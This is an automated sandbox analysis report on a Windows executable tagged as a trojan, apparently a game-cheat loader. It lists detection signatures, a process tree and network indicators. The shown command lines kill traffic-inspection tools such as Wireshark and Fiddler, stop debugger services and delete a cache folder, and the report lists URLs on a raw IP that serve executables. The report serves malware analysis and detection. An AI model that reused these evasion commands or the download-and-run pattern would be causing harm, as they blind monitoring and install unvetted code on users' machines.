Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oMBUxRQ4cj.exe

Overview

General Information

Sample name:oMBUxRQ4cj.exe
renamed because original name is a hash value
Original sample name:be1bc9129a29112cf1d62b178517de03.exe
Analysis ID:1538234
MD5:be1bc9129a29112cf1d62b178517de03
SHA1:d93ce38e29d5643fdda4d786a0194fbed04c68b9
SHA256:ff4475b9917de9cdd66f95df8f764433961e992a28942b595933ecf0a8c82db8
Tags:64exetrojan
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found API chain indicative of debugger detection
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Uses Microsoft's Enhanced Cryptographic Provider
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • oMBUxRQ4cj.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\oMBUxRQ4cj.exe" MD5: BE1BC9129A29112CF1D62B178517DE03)
    • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5972 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1644 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 432 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6644 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4288 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 1532 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6084 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 4824 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3876 cmdline: C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6968 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4836 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6148 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2172 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6660 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 5876 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 4288 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 1440 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1532 cmdline: C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 1632 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6180 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2780 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1360 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4836 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1892 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2672 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 432 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 2612 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 2472 cmdline: sc stop HTTPDebuggerProSdk MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6396 cmdline: C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • WerFault.exe (PID: 3680 cmdline: C:\Windows\system32\WerFault.exe -u -p 2640 -s 992 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: oMBUxRQ4cj.exeReversingLabs: Detection: 57%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: oMBUxRQ4cj.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A19F3D strtol,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strchr,_strdup,CertOpenStore,GetLastError,free,free,CryptStringToBinaryA,CertFindCertificateInStore,fopen,fseek,ftell,fseek,malloc,fread,fclose,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,CertCloseStore,calloc,CertFreeCertificateContext,fclose,free,CertFreeCertificateContext,free,calloc,0_2_00007FF7E5A19F3D
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A19300 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7E5A19300
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A19230 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00007FF7E5A19230
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A1C220 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7E5A1C220
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A1C1C0 CryptAcquireContextA,CryptCreateHash,0_2_00007FF7E5A1C1C0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A1C210 CryptHashData,0_2_00007FF7E5A1C210
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A363F0 GetLastError,CreateFileA,GetLastError,GetFileSizeEx,GetLastError,malloc,ReadFile,strstr,strstr,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,GetLastError,CloseHandle,free,0_2_00007FF7E5A363F0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3CE40 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF7E5A3CE40
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3EF30 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7E5A3EF30
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A35AD0 CertOpenStore,GetLastError,CertCreateCertificateChainEngine,GetLastError,CertGetCertificateChain,GetLastError,CertGetNameStringA,malloc,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertFreeCertificateChainEngine,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,0_2_00007FF7E5A35AD0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00007FF7E59FF0E0
Source: oMBUxRQ4cj.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: mov dword ptr [rbp+04h], 424D53FFh0_2_00007FF7E5A28B00
Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: oMBUxRQ4cj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Loader Valorant ESP\x64\Release\EpicGames.pdb source: oMBUxRQ4cj.exe
Source: global trafficHTTP traffic detected: POST /api/1.1/ HTTP/1.1Host: keyauth.winAccept: */*Content-Length: 58Content-Type: application/x-www-form-urlencoded
Source: Joe Sandbox ViewIP Address: 104.26.0.5 104.26.0.5
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59F1530 rand,rand,rand,SetConsoleTitleA,_invalid_parameter_noinfo_noreturn,GetConsoleWindow,GetWindowLongPtrA,SetWindowLongPtrA,SetLayeredWindowAttributes,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,GetStdHandle,SetConsoleTextAttribute,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,URLDownloadToFileA,system,system,Sleep,exit,URLDownloadToFileA,system,system,Sleep,exit,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E59F1530
Source: global trafficDNS traffic detected: DNS query: keyauth.win
Source: unknownHTTP traffic detected: POST /api/1.1/ HTTP/1.1Host: keyauth.winAccept: */*Content-Length: 58Content-Type: application/x-www-form-urlencoded
Source: oMBUxRQ4cj.exeString found in binary or memory: http://185.101.104.122/esphvciforabronkz.exe
Source: oMBUxRQ4cj.exeString found in binary or memory: http://185.101.104.122/esphvciforabronkz.exeC:
Source: oMBUxRQ4cj.exeString found in binary or memory: http://185.101.104.122/esphvcionbronkz.exe
Source: oMBUxRQ4cj.exeString found in binary or memory: http://185.101.104.122/esphvcionbronkz.exeC:
Source: Amcache.hve.38.drString found in binary or memory: http://upx.sf.net
Source: oMBUxRQ4cj.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: oMBUxRQ4cj.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/
Source: oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/64
Source: oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/um
Source: oMBUxRQ4cj.exe, 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmp, oMBUxRQ4cj.exe, 00000000.00000002.2284970904.00000239EB29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.2/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3CE40 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF7E5A3CE40
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59F15300_2_00007FF7E59F1530
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A0F5900_2_00007FF7E5A0F590
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A19F3D0_2_00007FF7E5A19F3D
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A069800_2_00007FF7E5A06980
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A089800_2_00007FF7E5A08980
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A07CC00_2_00007FF7E5A07CC0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A1C5D00_2_00007FF7E5A1C5D0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A315B00_2_00007FF7E5A315B0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A006000_2_00007FF7E5A00600
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A295200_2_00007FF7E5A29520
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A305800_2_00007FF7E5A30580
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59E955D0_2_00007FF7E59E955D
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A098400_2_00007FF7E5A09840
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A128900_2_00007FF7E5A12890
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59E973B0_2_00007FF7E59E973B
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59ED2500_2_00007FF7E59ED250
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A2D2200_2_00007FF7E5A2D220
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A153E00_2_00007FF7E5A153E0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A033300_2_00007FF7E5A03330
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3EEC00_2_00007FF7E5A3EEC0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A3CE400_2_00007FF7E5A3CE40
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59EDDE00_2_00007FF7E59EDDE0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59E10000_2_00007FF7E59E1000
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A19FFC0_2_00007FF7E5A19FFC
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A1A0050_2_00007FF7E5A1A005
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A35AD00_2_00007FF7E5A35AD0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A249F00_2_00007FF7E5A249F0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59F89900_2_00007FF7E59F8990
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E5A17CC00_2_00007FF7E5A17CC0
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59EABFD0_2_00007FF7E59EABFD
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59EEB700_2_00007FF7E59EEB70
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A08DB0 appears 46 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E59F3030 appears 49 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A05970 appears 378 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A0A410 appears 34 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A05AF0 appears 323 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A40236 appears 47 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A0A330 appears 33 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A00240 appears 70 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A08E80 appears 35 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: String function: 00007FF7E5A0A2A0 appears 37 times
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2640 -s 992
Source: classification engineClassification label: mal60.evad.winEXE@68/22@1/2
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeCode function: 0_2_00007FF7E59F2640 GetLastError,_errno,FormatMessageA,strchr,_errno,_errno,GetLastError,SetLastError,0_2_00007FF7E59F2640
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2640
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\34082a48-cc79-4c4c-9f15-ad727fd95d3aJump to behavior
Source: oMBUxRQ4cj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: oMBUxRQ4cj.exeReversingLabs: Detection: 57%
Source: oMBUxRQ4cj.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectory0123456789abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ(nil)(nil)I32I64%ld.%ld$@
Source: unknownProcess created: C:\Users\user\Desktop\oMBUxRQ4cj.exe "C:\Users\user\Desktop\oMBUxRQ4cj.exe"
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
Source: C:\Users\user\Desktop\oMBUxRQ4cj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
